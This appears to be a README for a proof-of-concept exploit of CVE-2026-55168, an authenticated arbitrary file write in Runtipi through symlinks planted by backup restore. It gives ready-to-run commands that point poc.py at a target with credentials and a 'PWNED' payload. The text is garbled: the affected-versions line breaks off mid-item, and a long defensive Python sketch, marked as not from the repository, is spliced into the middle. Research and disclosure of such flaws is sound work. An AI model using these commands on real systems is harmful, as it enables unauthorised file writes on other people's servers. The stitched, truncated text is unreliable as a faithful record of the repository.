## https://sploitus.com/exploit?id=991EB70F-4BBC-503F-933C-F7F6F0BCFE29
# CVE-2026-55168

This repository contains a simple PoC for **CVE-2026-55168** in **Runtipi**.

The issue is an authenticated arbitrary file write that can be reached through the backup restore flow. A crafted backup archive can plant a symlink into restored application data, and a later normal config update follows that symlink and writes attacker-controlled content outside the intended directory.

Reference advisory:

- https://github.com/runtipi/runtipi/security/advisories/GHSA-wcrf-g9p9-2wg7

Affected versions:

- `

```text
/data/state/proof.txt
```

After that, the normal request to update app config causes Runtipi to write the supplied content into:

```text
/data/state/proof.txt
```

So the important part is not just symlink persistence during restore, but the fact that a later legitimate write follows the planted symlink.
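A defensive sketch of both halves of the issue described above, added here as an example and not taken from Runtipi or from this repository's `poc.py`: `unsafe_members` lists the archive members a strict restore policy would refuse, and `write_no_follow` refuses to write through a symlink that is already on disk. The member names and directory layout are hypothetical and the sample archive is constructed; only `/data/state/proof.txt` comes from the text above. It assumes a POSIX system where `os.O_NOFOLLOW` is available.

```python
import io
import os
import tarfile
import tempfile

def unsafe_members(archive_bytes):
    """Names of members a restore should refuse: links, devices, absolute or '..' paths."""
    bad = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tar:
        for m in tar:
            escapes = m.name.startswith("/") or ".." in m.name.split("/")
            if escapes or not (m.isfile() or m.isdir()):
                bad.append(m.name)
    return bad

def write_no_follow(root, relpath, data):
    """Write under root; fail if the parent resolves outside root or the target is a symlink."""
    root = os.path.realpath(root)
    parent = os.path.realpath(os.path.join(root, os.path.dirname(relpath)))
    if os.path.commonpath([root, parent]) != root:
        raise PermissionError("parent directory resolves outside " + root)
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW
    fd = os.open(os.path.join(parent, os.path.basename(relpath)), flags, 0o600)  # OSError on a symlink
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)

def build_sample_archive():
    """Constructed sample backup: one regular file and one symlink member (hypothetical names)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        good = tarfile.TarInfo("app-data/settings.json")
        good.size = 2
        tar.addfile(good, io.BytesIO(b"{}"))
        link = tarfile.TarInfo("user-config/app.env")
        link.type, link.linkname = tarfile.SYMTYPE, "/data/state/proof.txt"
        tar.addfile(link)
    return buf.getvalue()

def demo():  # returns (refused members, write blocked?, size of the file outside root)
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as other:
        outside = os.path.join(other, "proof.txt")
        open(outside, "w").close()
        os.symlink(outside, os.path.join(root, "app.env"))  # state an unchecked restore leaves behind
        blocked = False
        try:
            write_no_follow(root, "app.env", b"new config")
        except OSError:
            blocked = True
        return unsafe_members(build_sample_archive()), blocked, os.path.getsize(outside)
```

Either check alone breaks the chain: the restore-time check keeps the link off disk, and the write-time check keeps a link that is already there from redirecting a later config write.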

## Files

- `poc.py`: end-to-end Python PoC

## Usage

```bash
python poc.py \
  --base-url http://127.0.0.1:3001 \
  --username YOUR_USERNAME \
  --password YOUR_PASSWORD \
  --app-urn demoapp3:_user \
  --target-path /data/state/proof.txt \
  --write-content PWNED_FROM_USERCFG_WRITE
```

If you want, you can also save the generated archive locally:

```bash
python poc.py \
  --base-url http://127.0.0.1:3001 \
  --username YOUR_USERNAME \
  --password YOUR_PASSWORD \
  --output payload.tar.gz
```

## Expected result

If the target is vulnerable, the script finishes successfully and prints a small JSON result with `status: "ok"`.

## Notes

This PoC is provided for research and reproduction purposes.